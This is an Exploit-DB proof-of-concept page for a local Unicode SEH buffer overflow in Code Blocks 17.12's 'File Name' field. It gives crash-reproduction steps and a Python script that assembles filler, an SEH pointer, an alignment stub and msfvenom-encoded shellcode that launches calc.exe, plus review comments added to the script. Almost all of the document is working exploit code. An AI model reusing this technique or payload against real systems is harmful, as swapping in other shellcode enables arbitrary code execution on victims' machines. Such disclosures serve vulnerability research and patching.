Code Blocks 17.12 – ‘File Name’ Local Buffer Overflow (Unicode) (SEH) (PoC)

  • 作者: Paras Bhatia
    日期: 2020-06-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48594/
  • # Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) 
    # Vendor Homepage: http://www.codeblocks.org/ 
    # Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
    # Exploit Author: Paras Bhatia
    # Discovery Date: 2020-06-16
    # Vulnerable Software: Code Blocks
    # Version: 17.12
    # Vulnerability Type: Local Buffer Overflow
    # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
    
    #Steps to Produce the Crash:
    
    # 1.- Run python code: codeblocks.py
    # 2.- Copy content to clipboard
    # 3.- Turn off DEP for codeblocks.exe
    # 4.- Open "codeblocks.exe"
    # 5.- Go to "File" > "New" > "Project..."
    # 6.- Click on "Files" from left box > Select "C/C++ header" > Click on "Go" > Click on "Next"
    # 7.- Paste ClipBoard into the "Filename with fullpath:" .
    # 8.- Click on "Finish".
    # 9.- Calc.exe runs.
    
    
    #################################################################################################################################################
    
    #Python "codeblocks.py" Code:
    
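    # Assemble the crafted "Filename with fullpath:" string used in the steps
    # above and write it to codeblocks.txt.  The pieces, in order, are the ones
    # the author's own comments name: junk1 (filler), nseh, seh, ven (alignment
    # stub), junk2 (spacer so EAX lands on buf), buf (msfvenom output), junk3
    # (trailing padding).
    #
    # NOTE(review): this reads as a Python 2 script -- there the "\xNN" literals
    # are byte strings and a text-mode write stores each escape as one byte.
    # Under Python 3 the same literals are str and the text-mode write
    # re-encodes them (UTF-8 by default), so the bytes on disk differ.
    # TODO confirm which interpreter the author used.

    junk1 = "A" * 2006

    nseh = "\x61\x62"  # popad / align

    # Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible **** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]- C:\Program Files\CodeBlocks\codeblocks.exe
    seh = "\xe0\x50"

    ven = "\x62"  # align
    ven += "\x53"  # push ebx
    ven += "\x62"  # align
    ven += "\x58"  # pop eax
    ven += "\x62"  # align
    ven += "\x05\x14\x11"  # add eax, 0x11001400
    ven += "\x62"  # align
    ven += "\x2d\x13\x11"  # sub eax, 0x11001300
    ven += "\x62"  # align

    ven += "\x50"  # push eax
    ven += "\x62"  # align
    ven += "\xc3"  # ret

    junk2 = "\x41" * 108  # required to make sure shellcode = eax

    # msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX
    buf = ""
    buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
    buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
    buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
    buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
    buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
    buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
    buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
    buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
    buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
    buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72"
    buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50"
    buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b"
    buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52"
    buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31"
    buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c"
    buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37"
    buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a"
    buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71"
    buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34"
    buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79"
    buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52"
    buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71"
    buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30"
    buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d"
    buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c"
    buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b"
    buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b"
    buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34"
    buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32"
    buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b"
    buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64"
    buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30"
    buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66"
    buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78"
    buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d"
    buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70"
    buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52"
    buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43"
    buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53"
    buf += "\x35\x6d\x30\x41\x41"

    junk3 = "\x62" * 5000  # padding to crash

    payload = junk1 + nseh + seh + ven + junk2 + buf + junk3

    # The original ended with a bare `f.close` -- an attribute reference that
    # never calls close(), so the buffered write was only flushed when the
    # interpreter tore the object down.  A context manager closes (and flushes)
    # the handle deterministically, and opening it here rather than at the top
    # keeps the file from being created before the payload is ready.
    with open("codeblocks.txt", "w") as f:
        f.write(payload)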